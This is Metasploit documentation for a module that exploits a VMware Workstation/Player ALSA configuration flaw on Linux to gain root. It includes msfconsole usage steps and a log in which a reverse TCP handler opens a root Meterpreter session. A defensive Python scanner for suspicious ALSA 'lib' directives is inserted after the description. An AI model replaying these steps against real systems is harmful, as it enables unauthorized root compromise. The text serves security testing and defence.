metasploit-gs/documentation/modules/exploit/linux/local/vmware_alsa_config.md
2017-06-23 12:40:53 +00:00


Description

This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.
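A defensive check for the condition described above, added here as an example and not part of the Metasploit module or its documentation: it scans ALSA configuration text (for example a user's ~/.asoundrc, the file the Scenarios output shows being removed) for lib directives that point outside the system library directories. The trusted directory list, the function names and the sample input are assumptions for illustration.

```python
import posixpath
import re

# Directories where ALSA plugins normally live (assumption; adjust per distro).
TRUSTED_LIB_DIRS = ("/usr/lib", "/usr/lib64", "/lib", "/lib64")

# A `lib` key (bare or as the last part of a dotted key) and its value.
LIB_RE = re.compile(
    r"""(?:^|[\s{;,.])lib(?:\s*=\s*|\s+)(?:"([^"]+)"|'([^']+)'|([^\s;,#}]+))"""
)

def find_lib_directives(text):
    """Return (line_number, path) for every `lib` assignment in ALSA config text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):  # whole-line comment
            continue
        for m in LIB_RE.finditer(line):
            hits.append((lineno, next(g for g in m.groups() if g)))
    return hits

def is_suspicious(path):
    """True if the library path points outside the trusted plugin directories."""
    if "/" not in path:
        return False  # bare name: assumed to resolve via the normal search path
    norm = posixpath.normpath(path)  # collapse ../ before comparing prefixes
    if not norm.startswith("/"):
        return True  # relative path with directory components
    return not any(norm.startswith(d + "/") for d in TRUSTED_LIB_DIRS)

def scan(text):
    """Return the `lib` directives an analyst should review."""
    return [(n, p) for n, p in find_lib_directives(text) if is_suspicious(p)]

# Constructed sample, not taken from the module or from a real host.
SAMPLE_ASOUNDRC = """\
pcm.!default { type hw card 0 }
func.example_hook {
    lib "/tmp/.example/libhook.so"
    func "example"
}
pcm_type.pulse { lib "libasound_module_pcm_pulse.so" }
ctl_type.x.lib /usr/lib/../../var/tmp/x.so
"""

if __name__ == "__main__":
    for lineno, path in scan(SAMPLE_ASOUNDRC):
        print(f"line {lineno}: loads {path}")
```

Run it over each user's ALSA configuration on hosts with VMware Workstation Pro or Player older than 12.5.6; a hit is a lead for review, not proof of compromise.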

Vulnerable Application

VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.

This module has been tested successfully on:

  • VMware Player version 12.5.0 on Debian Linux

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/vmware_alsa_config
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options

SESSION

The session to run this module on. Existing sessions can be listed with the sessions command.

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios

msf exploit(vmware_alsa_config) > check

[!] SESSION may not be compatible with this module.
[+] Target version is vulnerable
[+]  The target is vulnerable.
msf exploit(vmware_alsa_config) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.181:4444 
[+] Target version is vulnerable
[*] Launching VMware Player...
[*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400
[*] Removing /tmp/.baVu7FwzlaIQyp
[*] Removing /home/user/.asoundrc

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.221
OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
Architecture : x64
Meterpreter  : x64/linux